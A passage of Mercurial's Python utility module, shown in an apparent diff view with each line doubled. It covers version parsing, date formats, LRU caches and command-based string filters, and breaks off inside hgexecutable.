429 def popen4(cmd, env=None, newlines=False, bufsize=-1):
428 def popen4(cmd, env=None, newlines=False, bufsize=-1):
430 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
429 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
431 close_fds=closefds,
430 close_fds=closefds,
432 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
433 stderr=subprocess.PIPE,
432 stderr=subprocess.PIPE,
434 universal_newlines=newlines,
433 universal_newlines=newlines,
435 env=env)
434 env=env)
436 return p.stdin, p.stdout, p.stderr, p
435 return p.stdin, p.stdout, p.stderr, p
437
436
438 def version():
437 def version():
439 """Return version information if available."""
438 """Return version information if available."""
440 try:
439 try:
441 from . import __version__
440 from . import __version__
442 return __version__.version
441 return __version__.version
443 except ImportError:
442 except ImportError:
444 return 'unknown'
443 return 'unknown'
445
444
446 def versiontuple(v=None, n=4):
445 def versiontuple(v=None, n=4):
447 """Parses a Mercurial version string into an N-tuple.
446 """Parses a Mercurial version string into an N-tuple.
448
447
449 The version string to be parsed is specified with the ``v`` argument.
448 The version string to be parsed is specified with the ``v`` argument.
450 If it isn't defined, the current Mercurial version string will be parsed.
449 If it isn't defined, the current Mercurial version string will be parsed.
451
450
452 ``n`` can be 2, 3, or 4. Here is how some version strings map to
451 ``n`` can be 2, 3, or 4. Here is how some version strings map to
453 returned values:
452 returned values:
454
453
455 >>> v = '3.6.1+190-df9b73d2d444'
454 >>> v = '3.6.1+190-df9b73d2d444'
456 >>> versiontuple(v, 2)
455 >>> versiontuple(v, 2)
457 (3, 6)
456 (3, 6)
458 >>> versiontuple(v, 3)
457 >>> versiontuple(v, 3)
459 (3, 6, 1)
458 (3, 6, 1)
460 >>> versiontuple(v, 4)
459 >>> versiontuple(v, 4)
461 (3, 6, 1, '190-df9b73d2d444')
460 (3, 6, 1, '190-df9b73d2d444')
462
461
463 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
462 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
464 (3, 6, 1, '190-df9b73d2d444+20151118')
463 (3, 6, 1, '190-df9b73d2d444+20151118')
465
464
466 >>> v = '3.6'
465 >>> v = '3.6'
467 >>> versiontuple(v, 2)
466 >>> versiontuple(v, 2)
468 (3, 6)
467 (3, 6)
469 >>> versiontuple(v, 3)
468 >>> versiontuple(v, 3)
470 (3, 6, None)
469 (3, 6, None)
471 >>> versiontuple(v, 4)
470 >>> versiontuple(v, 4)
472 (3, 6, None, None)
471 (3, 6, None, None)
473
472
474 >>> v = '3.9-rc'
473 >>> v = '3.9-rc'
475 >>> versiontuple(v, 2)
474 >>> versiontuple(v, 2)
476 (3, 9)
475 (3, 9)
477 >>> versiontuple(v, 3)
476 >>> versiontuple(v, 3)
478 (3, 9, None)
477 (3, 9, None)
479 >>> versiontuple(v, 4)
478 >>> versiontuple(v, 4)
480 (3, 9, None, 'rc')
479 (3, 9, None, 'rc')
481
480
482 >>> v = '3.9-rc+2-02a8fea4289b'
481 >>> v = '3.9-rc+2-02a8fea4289b'
483 >>> versiontuple(v, 2)
482 >>> versiontuple(v, 2)
484 (3, 9)
483 (3, 9)
485 >>> versiontuple(v, 3)
484 >>> versiontuple(v, 3)
486 (3, 9, None)
485 (3, 9, None)
487 >>> versiontuple(v, 4)
486 >>> versiontuple(v, 4)
488 (3, 9, None, 'rc+2-02a8fea4289b')
487 (3, 9, None, 'rc+2-02a8fea4289b')
489 """
488 """
490 if not v:
489 if not v:
491 v = version()
490 v = version()
492 parts = remod.split('[\+-]', v, 1)
491 parts = remod.split('[\+-]', v, 1)
493 if len(parts) == 1:
492 if len(parts) == 1:
494 vparts, extra = parts[0], None
493 vparts, extra = parts[0], None
495 else:
494 else:
496 vparts, extra = parts
495 vparts, extra = parts
497
496
498 vints = []
497 vints = []
499 for i in vparts.split('.'):
498 for i in vparts.split('.'):
500 try:
499 try:
501 vints.append(int(i))
500 vints.append(int(i))
502 except ValueError:
501 except ValueError:
503 break
502 break
504 # (3, 6) -> (3, 6, None)
503 # (3, 6) -> (3, 6, None)
505 while len(vints) < 3:
504 while len(vints) < 3:
506 vints.append(None)
505 vints.append(None)
507
506
508 if n == 2:
507 if n == 2:
509 return (vints[0], vints[1])
508 return (vints[0], vints[1])
510 if n == 3:
509 if n == 3:
511 return (vints[0], vints[1], vints[2])
510 return (vints[0], vints[1], vints[2])
512 if n == 4:
511 if n == 4:
513 return (vints[0], vints[1], vints[2], extra)
512 return (vints[0], vints[1], vints[2], extra)
514
513
515 # used by parsedate
514 # used by parsedate
516 defaultdateformats = (
515 defaultdateformats = (
517 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
516 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
518 '%Y-%m-%dT%H:%M', # without seconds
517 '%Y-%m-%dT%H:%M', # without seconds
519 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
518 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
520 '%Y-%m-%dT%H%M', # without seconds
519 '%Y-%m-%dT%H%M', # without seconds
521 '%Y-%m-%d %H:%M:%S', # our common legal variant
520 '%Y-%m-%d %H:%M:%S', # our common legal variant
522 '%Y-%m-%d %H:%M', # without seconds
521 '%Y-%m-%d %H:%M', # without seconds
523 '%Y-%m-%d %H%M%S', # without :
522 '%Y-%m-%d %H%M%S', # without :
524 '%Y-%m-%d %H%M', # without seconds
523 '%Y-%m-%d %H%M', # without seconds
525 '%Y-%m-%d %I:%M:%S%p',
524 '%Y-%m-%d %I:%M:%S%p',
526 '%Y-%m-%d %H:%M',
525 '%Y-%m-%d %H:%M',
527 '%Y-%m-%d %I:%M%p',
526 '%Y-%m-%d %I:%M%p',
528 '%Y-%m-%d',
527 '%Y-%m-%d',
529 '%m-%d',
528 '%m-%d',
530 '%m/%d',
529 '%m/%d',
531 '%m/%d/%y',
530 '%m/%d/%y',
532 '%m/%d/%Y',
531 '%m/%d/%Y',
533 '%a %b %d %H:%M:%S %Y',
532 '%a %b %d %H:%M:%S %Y',
534 '%a %b %d %I:%M:%S%p %Y',
533 '%a %b %d %I:%M:%S%p %Y',
535 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
534 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
536 '%b %d %H:%M:%S %Y',
535 '%b %d %H:%M:%S %Y',
537 '%b %d %I:%M:%S%p %Y',
536 '%b %d %I:%M:%S%p %Y',
538 '%b %d %H:%M:%S',
537 '%b %d %H:%M:%S',
539 '%b %d %I:%M:%S%p',
538 '%b %d %I:%M:%S%p',
540 '%b %d %H:%M',
539 '%b %d %H:%M',
541 '%b %d %I:%M%p',
540 '%b %d %I:%M%p',
542 '%b %d %Y',
541 '%b %d %Y',
543 '%b %d',
542 '%b %d',
544 '%H:%M:%S',
543 '%H:%M:%S',
545 '%I:%M:%S%p',
544 '%I:%M:%S%p',
546 '%H:%M',
545 '%H:%M',
547 '%I:%M%p',
546 '%I:%M%p',
548 )
547 )
549
548
550 extendeddateformats = defaultdateformats + (
549 extendeddateformats = defaultdateformats + (
551 "%Y",
550 "%Y",
552 "%Y-%m",
551 "%Y-%m",
553 "%b",
552 "%b",
554 "%b %Y",
553 "%b %Y",
555 )
554 )
556
555
557 def cachefunc(func):
556 def cachefunc(func):
558 '''cache the result of function calls'''
557 '''cache the result of function calls'''
559 # XXX doesn't handle keywords args
558 # XXX doesn't handle keywords args
560 if func.__code__.co_argcount == 0:
559 if func.__code__.co_argcount == 0:
561 cache = []
560 cache = []
562 def f():
561 def f():
563 if len(cache) == 0:
562 if len(cache) == 0:
564 cache.append(func())
563 cache.append(func())
565 return cache[0]
564 return cache[0]
566 return f
565 return f
567 cache = {}
566 cache = {}
568 if func.__code__.co_argcount == 1:
567 if func.__code__.co_argcount == 1:
569 # we gain a small amount of time because
568 # we gain a small amount of time because
570 # we don't need to pack/unpack the list
569 # we don't need to pack/unpack the list
571 def f(arg):
570 def f(arg):
572 if arg not in cache:
571 if arg not in cache:
573 cache[arg] = func(arg)
572 cache[arg] = func(arg)
574 return cache[arg]
573 return cache[arg]
575 else:
574 else:
576 def f(*args):
575 def f(*args):
577 if args not in cache:
576 if args not in cache:
578 cache[args] = func(*args)
577 cache[args] = func(*args)
579 return cache[args]
578 return cache[args]
580
579
581 return f
580 return f
582
581
583 class sortdict(collections.OrderedDict):
582 class sortdict(collections.OrderedDict):
584 '''a simple sorted dictionary
583 '''a simple sorted dictionary
585
584
586 >>> d1 = sortdict([('a', 0), ('b', 1)])
585 >>> d1 = sortdict([('a', 0), ('b', 1)])
587 >>> d2 = d1.copy()
586 >>> d2 = d1.copy()
588 >>> d2
587 >>> d2
589 sortdict([('a', 0), ('b', 1)])
588 sortdict([('a', 0), ('b', 1)])
590 >>> d2.update([('a', 2)])
589 >>> d2.update([('a', 2)])
591 >>> d2.keys() # should still be in last-set order
590 >>> d2.keys() # should still be in last-set order
592 ['b', 'a']
591 ['b', 'a']
593 '''
592 '''
594
593
595 def __setitem__(self, key, value):
594 def __setitem__(self, key, value):
596 if key in self:
595 if key in self:
597 del self[key]
596 del self[key]
598 super(sortdict, self).__setitem__(key, value)
597 super(sortdict, self).__setitem__(key, value)
599
598
600 if pycompat.ispypy:
599 if pycompat.ispypy:
601 # __setitem__() isn't called as of PyPy 5.8.0
600 # __setitem__() isn't called as of PyPy 5.8.0
602 def update(self, src):
601 def update(self, src):
603 if isinstance(src, dict):
602 if isinstance(src, dict):
604 src = src.iteritems()
603 src = src.iteritems()
605 for k, v in src:
604 for k, v in src:
606 self[k] = v
605 self[k] = v
607
606
608 class transactional(object):
607 class transactional(object):
609 """Base class for making a transactional type into a context manager."""
608 """Base class for making a transactional type into a context manager."""
610 __metaclass__ = abc.ABCMeta
609 __metaclass__ = abc.ABCMeta
611
610
612 @abc.abstractmethod
611 @abc.abstractmethod
613 def close(self):
612 def close(self):
614 """Successfully closes the transaction."""
613 """Successfully closes the transaction."""
615
614
616 @abc.abstractmethod
615 @abc.abstractmethod
617 def release(self):
616 def release(self):
618 """Marks the end of the transaction.
617 """Marks the end of the transaction.
619
618
620 If the transaction has not been closed, it will be aborted.
619 If the transaction has not been closed, it will be aborted.
621 """
620 """
622
621
623 def __enter__(self):
622 def __enter__(self):
624 return self
623 return self
625
624
626 def __exit__(self, exc_type, exc_val, exc_tb):
625 def __exit__(self, exc_type, exc_val, exc_tb):
627 try:
626 try:
628 if exc_type is None:
627 if exc_type is None:
629 self.close()
628 self.close()
630 finally:
629 finally:
631 self.release()
630 self.release()
632
631
633 @contextlib.contextmanager
632 @contextlib.contextmanager
634 def acceptintervention(tr=None):
633 def acceptintervention(tr=None):
635 """A context manager that closes the transaction on InterventionRequired
634 """A context manager that closes the transaction on InterventionRequired
636
635
637 If no transaction was provided, this simply runs the body and returns
636 If no transaction was provided, this simply runs the body and returns
638 """
637 """
639 if not tr:
638 if not tr:
640 yield
639 yield
641 return
640 return
642 try:
641 try:
643 yield
642 yield
644 tr.close()
643 tr.close()
645 except error.InterventionRequired:
644 except error.InterventionRequired:
646 tr.close()
645 tr.close()
647 raise
646 raise
648 finally:
647 finally:
649 tr.release()
648 tr.release()
650
649
651 @contextlib.contextmanager
650 @contextlib.contextmanager
652 def nullcontextmanager():
651 def nullcontextmanager():
653 yield
652 yield
654
653
655 class _lrucachenode(object):
654 class _lrucachenode(object):
656 """A node in a doubly linked list.
655 """A node in a doubly linked list.
657
656
658 Holds a reference to nodes on either side as well as a key-value
657 Holds a reference to nodes on either side as well as a key-value
659 pair for the dictionary entry.
658 pair for the dictionary entry.
660 """
659 """
661 __slots__ = (u'next', u'prev', u'key', u'value')
660 __slots__ = (u'next', u'prev', u'key', u'value')
662
661
663 def __init__(self):
662 def __init__(self):
664 self.next = None
663 self.next = None
665 self.prev = None
664 self.prev = None
666
665
667 self.key = _notset
666 self.key = _notset
668 self.value = None
667 self.value = None
669
668
670 def markempty(self):
669 def markempty(self):
671 """Mark the node as emptied."""
670 """Mark the node as emptied."""
672 self.key = _notset
671 self.key = _notset
673
672
674 class lrucachedict(object):
673 class lrucachedict(object):
675 """Dict that caches most recent accesses and sets.
674 """Dict that caches most recent accesses and sets.
676
675
677 The dict consists of an actual backing dict - indexed by original
676 The dict consists of an actual backing dict - indexed by original
678 key - and a doubly linked circular list defining the order of entries in
677 key - and a doubly linked circular list defining the order of entries in
679 the cache.
678 the cache.
680
679
681 The head node is the newest entry in the cache. If the cache is full,
680 The head node is the newest entry in the cache. If the cache is full,
682 we recycle head.prev and make it the new head. Cache accesses result in
681 we recycle head.prev and make it the new head. Cache accesses result in
683 the node being moved to before the existing head and being marked as the
682 the node being moved to before the existing head and being marked as the
684 new head node.
683 new head node.
685 """
684 """
686 def __init__(self, max):
685 def __init__(self, max):
687 self._cache = {}
686 self._cache = {}
688
687
689 self._head = head = _lrucachenode()
688 self._head = head = _lrucachenode()
690 head.prev = head
689 head.prev = head
691 head.next = head
690 head.next = head
692 self._size = 1
691 self._size = 1
693 self._capacity = max
692 self._capacity = max
694
693
695 def __len__(self):
694 def __len__(self):
696 return len(self._cache)
695 return len(self._cache)
697
696
698 def __contains__(self, k):
697 def __contains__(self, k):
699 return k in self._cache
698 return k in self._cache
700
699
701 def __iter__(self):
700 def __iter__(self):
702 # We don't have to iterate in cache order, but why not.
701 # We don't have to iterate in cache order, but why not.
703 n = self._head
702 n = self._head
704 for i in range(len(self._cache)):
703 for i in range(len(self._cache)):
705 yield n.key
704 yield n.key
706 n = n.next
705 n = n.next
707
706
708 def __getitem__(self, k):
707 def __getitem__(self, k):
709 node = self._cache[k]
708 node = self._cache[k]
710 self._movetohead(node)
709 self._movetohead(node)
711 return node.value
710 return node.value
712
711
713 def __setitem__(self, k, v):
712 def __setitem__(self, k, v):
714 node = self._cache.get(k)
713 node = self._cache.get(k)
715 # Replace existing value and mark as newest.
714 # Replace existing value and mark as newest.
716 if node is not None:
715 if node is not None:
717 node.value = v
716 node.value = v
718 self._movetohead(node)
717 self._movetohead(node)
719 return
718 return
720
719
721 if self._size < self._capacity:
720 if self._size < self._capacity:
722 node = self._addcapacity()
721 node = self._addcapacity()
723 else:
722 else:
724 # Grab the last/oldest item.
723 # Grab the last/oldest item.
725 node = self._head.prev
724 node = self._head.prev
726
725
727 # At capacity. Kill the old entry.
726 # At capacity. Kill the old entry.
728 if node.key is not _notset:
727 if node.key is not _notset:
729 del self._cache[node.key]
728 del self._cache[node.key]
730
729
731 node.key = k
730 node.key = k
732 node.value = v
731 node.value = v
733 self._cache[k] = node
732 self._cache[k] = node
734 # And mark it as newest entry. No need to adjust order since it
733 # And mark it as newest entry. No need to adjust order since it
735 # is already self._head.prev.
734 # is already self._head.prev.
736 self._head = node
735 self._head = node
737
736
738 def __delitem__(self, k):
737 def __delitem__(self, k):
739 node = self._cache.pop(k)
738 node = self._cache.pop(k)
740 node.markempty()
739 node.markempty()
741
740
742 # Temporarily mark as newest item before re-adjusting head to make
741 # Temporarily mark as newest item before re-adjusting head to make
743 # this node the oldest item.
742 # this node the oldest item.
744 self._movetohead(node)
743 self._movetohead(node)
745 self._head = node.next
744 self._head = node.next
746
745
747 # Additional dict methods.
746 # Additional dict methods.
748
747
749 def get(self, k, default=None):
748 def get(self, k, default=None):
750 try:
749 try:
751 return self._cache[k].value
750 return self._cache[k].value
752 except KeyError:
751 except KeyError:
753 return default
752 return default
754
753
755 def clear(self):
754 def clear(self):
756 n = self._head
755 n = self._head
757 while n.key is not _notset:
756 while n.key is not _notset:
758 n.markempty()
757 n.markempty()
759 n = n.next
758 n = n.next
760
759
761 self._cache.clear()
760 self._cache.clear()
762
761
763 def copy(self):
762 def copy(self):
764 result = lrucachedict(self._capacity)
763 result = lrucachedict(self._capacity)
765 n = self._head.prev
764 n = self._head.prev
766 # Iterate in oldest-to-newest order, so the copy has the right ordering
765 # Iterate in oldest-to-newest order, so the copy has the right ordering
767 for i in range(len(self._cache)):
766 for i in range(len(self._cache)):
768 result[n.key] = n.value
767 result[n.key] = n.value
769 n = n.prev
768 n = n.prev
770 return result
769 return result
771
770
772 def _movetohead(self, node):
771 def _movetohead(self, node):
773 """Mark a node as the newest, making it the new head.
772 """Mark a node as the newest, making it the new head.
774
773
775 When a node is accessed, it becomes the freshest entry in the LRU
774 When a node is accessed, it becomes the freshest entry in the LRU
776 list, which is denoted by self._head.
775 list, which is denoted by self._head.
777
776
778 Visually, let's make ``N`` the new head node (* denotes head):
777 Visually, let's make ``N`` the new head node (* denotes head):
779
778
780 previous/oldest <-> head <-> next/next newest
779 previous/oldest <-> head <-> next/next newest
781
780
782 ----<->--- A* ---<->-----
781 ----<->--- A* ---<->-----
783 | |
782 | |
784 E <-> D <-> N <-> C <-> B
783 E <-> D <-> N <-> C <-> B
785
784
786 To:
785 To:
787
786
788 ----<->--- N* ---<->-----
787 ----<->--- N* ---<->-----
789 | |
788 | |
790 E <-> D <-> C <-> B <-> A
789 E <-> D <-> C <-> B <-> A
791
790
792 This requires the following moves:
791 This requires the following moves:
793
792
794 C.next = D (node.prev.next = node.next)
793 C.next = D (node.prev.next = node.next)
795 D.prev = C (node.next.prev = node.prev)
794 D.prev = C (node.next.prev = node.prev)
796 E.next = N (head.prev.next = node)
795 E.next = N (head.prev.next = node)
797 N.prev = E (node.prev = head.prev)
796 N.prev = E (node.prev = head.prev)
798 N.next = A (node.next = head)
797 N.next = A (node.next = head)
799 A.prev = N (head.prev = node)
798 A.prev = N (head.prev = node)
800 """
799 """
801 head = self._head
800 head = self._head
802 # C.next = D
801 # C.next = D
803 node.prev.next = node.next
802 node.prev.next = node.next
804 # D.prev = C
803 # D.prev = C
805 node.next.prev = node.prev
804 node.next.prev = node.prev
806 # N.prev = E
805 # N.prev = E
807 node.prev = head.prev
806 node.prev = head.prev
808 # N.next = A
807 # N.next = A
809 # It is tempting to do just "head" here, however if node is
808 # It is tempting to do just "head" here, however if node is
810 # adjacent to head, this will do bad things.
809 # adjacent to head, this will do bad things.
811 node.next = head.prev.next
810 node.next = head.prev.next
812 # E.next = N
811 # E.next = N
813 node.next.prev = node
812 node.next.prev = node
814 # A.prev = N
813 # A.prev = N
815 node.prev.next = node
814 node.prev.next = node
816
815
817 self._head = node
816 self._head = node
818
817
819 def _addcapacity(self):
818 def _addcapacity(self):
820 """Add a node to the circular linked list.
819 """Add a node to the circular linked list.
821
820
822 The new node is inserted before the head node.
821 The new node is inserted before the head node.
823 """
822 """
824 head = self._head
823 head = self._head
825 node = _lrucachenode()
824 node = _lrucachenode()
826 head.prev.next = node
825 head.prev.next = node
827 node.prev = head.prev
826 node.prev = head.prev
828 node.next = head
827 node.next = head
829 head.prev = node
828 head.prev = node
830 self._size += 1
829 self._size += 1
831 return node
830 return node
832
831
833 def lrucachefunc(func):
832 def lrucachefunc(func):
834 '''cache most recent results of function calls'''
833 '''cache most recent results of function calls'''
835 cache = {}
834 cache = {}
836 order = collections.deque()
835 order = collections.deque()
837 if func.__code__.co_argcount == 1:
836 if func.__code__.co_argcount == 1:
838 def f(arg):
837 def f(arg):
839 if arg not in cache:
838 if arg not in cache:
840 if len(cache) > 20:
839 if len(cache) > 20:
841 del cache[order.popleft()]
840 del cache[order.popleft()]
842 cache[arg] = func(arg)
841 cache[arg] = func(arg)
843 else:
842 else:
844 order.remove(arg)
843 order.remove(arg)
845 order.append(arg)
844 order.append(arg)
846 return cache[arg]
845 return cache[arg]
847 else:
846 else:
848 def f(*args):
847 def f(*args):
849 if args not in cache:
848 if args not in cache:
850 if len(cache) > 20:
849 if len(cache) > 20:
851 del cache[order.popleft()]
850 del cache[order.popleft()]
852 cache[args] = func(*args)
851 cache[args] = func(*args)
853 else:
852 else:
854 order.remove(args)
853 order.remove(args)
855 order.append(args)
854 order.append(args)
856 return cache[args]
855 return cache[args]
857
856
858 return f
857 return f
859
858
860 class propertycache(object):
859 class propertycache(object):
861 def __init__(self, func):
860 def __init__(self, func):
862 self.func = func
861 self.func = func
863 self.name = func.__name__
862 self.name = func.__name__
864 def __get__(self, obj, type=None):
863 def __get__(self, obj, type=None):
865 result = self.func(obj)
864 result = self.func(obj)
866 self.cachevalue(obj, result)
865 self.cachevalue(obj, result)
867 return result
866 return result
868
867
869 def cachevalue(self, obj, value):
868 def cachevalue(self, obj, value):
870 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
869 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
871 obj.__dict__[self.name] = value
870 obj.__dict__[self.name] = value
872
871
873 def pipefilter(s, cmd):
872 def pipefilter(s, cmd):
874 '''filter string S through command CMD, returning its output'''
873 '''filter string S through command CMD, returning its output'''
875 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
874 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
876 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
875 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
877 pout, perr = p.communicate(s)
876 pout, perr = p.communicate(s)
878 return pout
877 return pout
879
878
880 def tempfilter(s, cmd):
879 def tempfilter(s, cmd):
881 '''filter string S through a pair of temporary files with CMD.
880 '''filter string S through a pair of temporary files with CMD.
882 CMD is used as a template to create the real command to be run,
881 CMD is used as a template to create the real command to be run,
883 with the strings INFILE and OUTFILE replaced by the real names of
882 with the strings INFILE and OUTFILE replaced by the real names of
884 the temporary files generated.'''
883 the temporary files generated.'''
885 inname, outname = None, None
884 inname, outname = None, None
886 try:
885 try:
887 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
886 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
888 fp = os.fdopen(infd, pycompat.sysstr('wb'))
887 fp = os.fdopen(infd, pycompat.sysstr('wb'))
889 fp.write(s)
888 fp.write(s)
890 fp.close()
889 fp.close()
891 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
890 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
892 os.close(outfd)
891 os.close(outfd)
893 cmd = cmd.replace('INFILE', inname)
892 cmd = cmd.replace('INFILE', inname)
894 cmd = cmd.replace('OUTFILE', outname)
893 cmd = cmd.replace('OUTFILE', outname)
895 code = os.system(cmd)
894 code = os.system(cmd)
896 if pycompat.sysplatform == 'OpenVMS' and code & 1:
895 if pycompat.sysplatform == 'OpenVMS' and code & 1:
897 code = 0
896 code = 0
898 if code:
897 if code:
899 raise Abort(_("command '%s' failed: %s") %
898 raise Abort(_("command '%s' failed: %s") %
900 (cmd, explainexit(code)))
899 (cmd, explainexit(code)))
901 return readfile(outname)
900 return readfile(outname)
902 finally:
901 finally:
903 try:
902 try:
904 if inname:
903 if inname:
905 os.unlink(inname)
904 os.unlink(inname)
906 except OSError:
905 except OSError:
907 pass
906 pass
908 try:
907 try:
909 if outname:
908 if outname:
910 os.unlink(outname)
909 os.unlink(outname)
911 except OSError:
910 except OSError:
912 pass
911 pass
913
912
914 filtertable = {
913 filtertable = {
915 'tempfile:': tempfilter,
914 'tempfile:': tempfilter,
916 'pipe:': pipefilter,
915 'pipe:': pipefilter,
917 }
916 }
918
917
919 def filter(s, cmd):
918 def filter(s, cmd):
920 "filter a string through a command that transforms its input to its output"
919 "filter a string through a command that transforms its input to its output"
921 for name, fn in filtertable.iteritems():
920 for name, fn in filtertable.iteritems():
922 if cmd.startswith(name):
921 if cmd.startswith(name):
923 return fn(s, cmd[len(name):].lstrip())
922 return fn(s, cmd[len(name):].lstrip())
924 return pipefilter(s, cmd)
923 return pipefilter(s, cmd)
925
924
926 def binary(s):
925 def binary(s):
927 """return true if a string is binary data"""
926 """return true if a string is binary data"""
928 return bool(s and '\0' in s)
927 return bool(s and '\0' in s)
929
928
930 def increasingchunks(source, min=1024, max=65536):
929 def increasingchunks(source, min=1024, max=65536):
931 '''return no less than min bytes per chunk while data remains,
930 '''return no less than min bytes per chunk while data remains,
932 doubling min after each chunk until it reaches max'''
931 doubling min after each chunk until it reaches max'''
933 def log2(x):
932 def log2(x):
934 if not x:
933 if not x:
935 return 0
934 return 0
936 i = 0
935 i = 0
937 while x:
936 while x:
938 x >>= 1
937 x >>= 1
939 i += 1
938 i += 1
940 return i - 1
939 return i - 1
941
940
942 buf = []
941 buf = []
943 blen = 0
942 blen = 0
944 for chunk in source:
943 for chunk in source:
945 buf.append(chunk)
944 buf.append(chunk)
946 blen += len(chunk)
945 blen += len(chunk)
947 if blen >= min:
946 if blen >= min:
948 if min < max:
947 if min < max:
949 min = min << 1
948 min = min << 1
950 nmin = 1 << log2(blen)
949 nmin = 1 << log2(blen)
951 if nmin > min:
950 if nmin > min:
952 min = nmin
951 min = nmin
953 if min > max:
952 if min > max:
954 min = max
953 min = max
955 yield ''.join(buf)
954 yield ''.join(buf)
956 blen = 0
955 blen = 0
957 buf = []
956 buf = []
958 if buf:
957 if buf:
959 yield ''.join(buf)
958 yield ''.join(buf)
960
959
961 Abort = error.Abort
960 Abort = error.Abort
962
961
963 def always(fn):
962 def always(fn):
964 return True
963 return True
965
964
966 def never(fn):
965 def never(fn):
967 return False
966 return False
968
967
969 def nogc(func):
968 def nogc(func):
970 """disable garbage collector
969 """disable garbage collector
971
970
972 Python's garbage collector triggers a GC each time a certain number of
971 Python's garbage collector triggers a GC each time a certain number of
973 container objects (the number being defined by gc.get_threshold()) are
972 container objects (the number being defined by gc.get_threshold()) are
974 allocated even when marked not to be tracked by the collector. Tracking has
973 allocated even when marked not to be tracked by the collector. Tracking has
975 no effect on when GCs are triggered, only on what objects the GC looks
974 no effect on when GCs are triggered, only on what objects the GC looks
976 into. As a workaround, disable GC while building complex (huge)
975 into. As a workaround, disable GC while building complex (huge)
977 containers.
976 containers.
978
977
979 This garbage collector issue have been fixed in 2.7. But it still affect
978 This garbage collector issue have been fixed in 2.7. But it still affect
980 CPython's performance.
979 CPython's performance.
981 """
980 """
982 def wrapper(*args, **kwargs):
981 def wrapper(*args, **kwargs):
983 gcenabled = gc.isenabled()
982 gcenabled = gc.isenabled()
984 gc.disable()
983 gc.disable()
985 try:
984 try:
986 return func(*args, **kwargs)
985 return func(*args, **kwargs)
987 finally:
986 finally:
988 if gcenabled:
987 if gcenabled:
989 gc.enable()
988 gc.enable()
990 return wrapper
989 return wrapper
991
990
992 if pycompat.ispypy:
991 if pycompat.ispypy:
993 # PyPy runs slower with gc disabled
992 # PyPy runs slower with gc disabled
994 nogc = lambda x: x
993 nogc = lambda x: x
995
994
996 def pathto(root, n1, n2):
995 def pathto(root, n1, n2):
997 '''return the relative path from one place to another.
996 '''return the relative path from one place to another.
998 root should use os.sep to separate directories
997 root should use os.sep to separate directories
999 n1 should use os.sep to separate directories
998 n1 should use os.sep to separate directories
1000 n2 should use "/" to separate directories
999 n2 should use "/" to separate directories
1001 returns an os.sep-separated path.
1000 returns an os.sep-separated path.
1002
1001
1003 If n1 is a relative path, it's assumed it's
1002 If n1 is a relative path, it's assumed it's
1004 relative to root.
1003 relative to root.
1005 n2 should always be relative to root.
1004 n2 should always be relative to root.
1006 '''
1005 '''
1007 if not n1:
1006 if not n1:
1008 return localpath(n2)
1007 return localpath(n2)
1009 if os.path.isabs(n1):
1008 if os.path.isabs(n1):
1010 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1009 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1011 return os.path.join(root, localpath(n2))
1010 return os.path.join(root, localpath(n2))
1012 n2 = '/'.join((pconvert(root), n2))
1011 n2 = '/'.join((pconvert(root), n2))
1013 a, b = splitpath(n1), n2.split('/')
1012 a, b = splitpath(n1), n2.split('/')
1014 a.reverse()
1013 a.reverse()
1015 b.reverse()
1014 b.reverse()
1016 while a and b and a[-1] == b[-1]:
1015 while a and b and a[-1] == b[-1]:
1017 a.pop()
1016 a.pop()
1018 b.pop()
1017 b.pop()
1019 b.reverse()
1018 b.reverse()
1020 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1019 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1021
1020
1022 def mainfrozen():
1021 def mainfrozen():
1023 """return True if we are a frozen executable.
1022 """return True if we are a frozen executable.
1024
1023
1025 The code supports py2exe (most common, Windows only) and tools/freeze
1024 The code supports py2exe (most common, Windows only) and tools/freeze
1026 (portable, not much used).
1025 (portable, not much used).
1027 """
1026 """
1028 return (safehasattr(sys, "frozen") or # new py2exe
1027 return (safehasattr(sys, "frozen") or # new py2exe
1029 safehasattr(sys, "importers") or # old py2exe
1028 safehasattr(sys, "importers") or # old py2exe
1030 imp.is_frozen(u"__main__")) # tools/freeze
1029 imp.is_frozen(u"__main__")) # tools/freeze
1031
1030
1032 # the location of data files matching the source code
1031 # the location of data files matching the source code
1033 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1032 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1034 # executable version (py2exe) doesn't support __file__
1033 # executable version (py2exe) doesn't support __file__
1035 datapath = os.path.dirname(pycompat.sysexecutable)
1034 datapath = os.path.dirname(pycompat.sysexecutable)
1036 else:
1035 else:
1037 datapath = os.path.dirname(pycompat.fsencode(__file__))
1036 datapath = os.path.dirname(pycompat.fsencode(__file__))
1038
1037
1039 i18n.setdatapath(datapath)
1038 i18n.setdatapath(datapath)
1040
1039
1041 _hgexecutable = None
1040 _hgexecutable = None
1042
1041
1043 def hgexecutable():
1042 def hgexecutable():
1044 """return location of the 'hg' executable.
1043 """return location of the 'hg' executable.
1045
1044
1046 Defaults to $HG or 'hg' in the search path.
1045 Defaults to $HG or 'hg' in the search path.
1047 """
1046 """
1048 if _hgexecutable is None:
1047 if _hgexecutable is None:
1049 hg = encoding.environ.get('HG')
1048 hg = encoding.environ.get('HG')
